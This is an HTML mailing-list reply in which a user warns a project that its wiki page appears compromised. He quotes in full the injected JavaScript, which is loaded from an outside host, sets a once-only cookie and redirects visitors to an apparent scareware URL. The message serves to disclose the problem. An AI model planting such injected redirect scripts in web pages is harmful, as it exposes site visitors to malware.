<div>On Tue, May 11, 2010 at 5:30 PM, Hernán Ordiales <span dir="ltr"><<a href="mailto:h@ordia.com.ar">h@ordia.com.ar</a>></span> wrote:<blockquote class="gmail_quote" style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0.8ex; border-left-width: 1px; border-left-color: rgb(204, 204, 204); border-left-style: solid; padding-left: 1ex; ">
[1] Example of a network using SpectrumView:<br><a href="http://clam-project.org/wiki/Image:ThreeBandFilterOutputWithWhiteNoiseAsInput.jpg" target="_blank">http://clam-project.org/wiki/Image:ThreeBandFilterOutputWithWhiteNoiseAsInput.jpg</a><br>
[2] <a href="http://clam-project.org/wiki/Manual_Annotator" target="_blank">http://clam-project.org/wiki/Manual_Annotator</a></blockquote><div><br></div><div>Thanks for the information... but... </div></div><div><br></div>
FYI, when I clicked on the first link, it popped up a "your computer is infected" dialog which I alt-f4'd away, and then it tried running something in the browser window so I alt-f4'd that. Hopefully someone hasn't figured out a way to own people browsing with Linux and google-chrome. You might want to make sure nothing funny is going on with your wiki.<div>
<br></div><div>Specifically out of index.php,  the following javascript is run: "script src="<a href="http://zettapetta.com/js.php">http://zettapetta.com/js.php</a>"</div>which contains:<br><br>1 function setCookie(c_name,value,expiredays){<br>
2    var exdate=new Date();<br>3    exdate.setDate(exdate.getDate()+expiredays);<br>4    document.cookie=c_name+ "=" +escape(value)+<br>5    ((expiredays==null) ? "" : ";expires="+exdate.toGMTString());<br>
6 }<br>7<br>8<br>9 function getCookie(c_name){<br>10 if (document.cookie.length>0)<br>11  {<br>12  c_start=document.cookie.indexOf(c_name + "=");<br>13  if (c_start!=-1)<br>14    {<br>15    c_start=c_start + c_name.length+1;<br>
16    c_end=document.cookie.indexOf(";",c_start);<br>17    if (c_end==-1) c_end=document.cookie.length;<br>18    return unescape(document.cookie.substring(c_start,c_end));<br>19    }<br>20  }<br>21 return "";<br>
22 }<br>23<br>24<br>25 var name=getCookie("pma_visited_theme1");<br>26 if (name==""){<br>27    setCookie("pma_visited_theme1","1",20);<br>28    var url="<a href="http://www4.suitcase52td.net/?p=p52dcWpkbmmHnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D">http://www4.suitcase52td.net/?p=p52dcWpkbmmHnc3KbmNToKV1iqHWnG2dXseYlWibZmeWmQ%3D%3D</a>";<br>
29    window.top.location.replace(url);<br>30 }else{<br>31<br>32<br>33 }<br>34<br><div><div><br></div><div>Not sure of the purpose of the above, but it doesn't seem like a good thing for a wiki to do. </div><div><br><div>
<div>Niels<br><a href="http://nielsmayer.com">http://nielsmayer.com</a><br></div></div></div></div>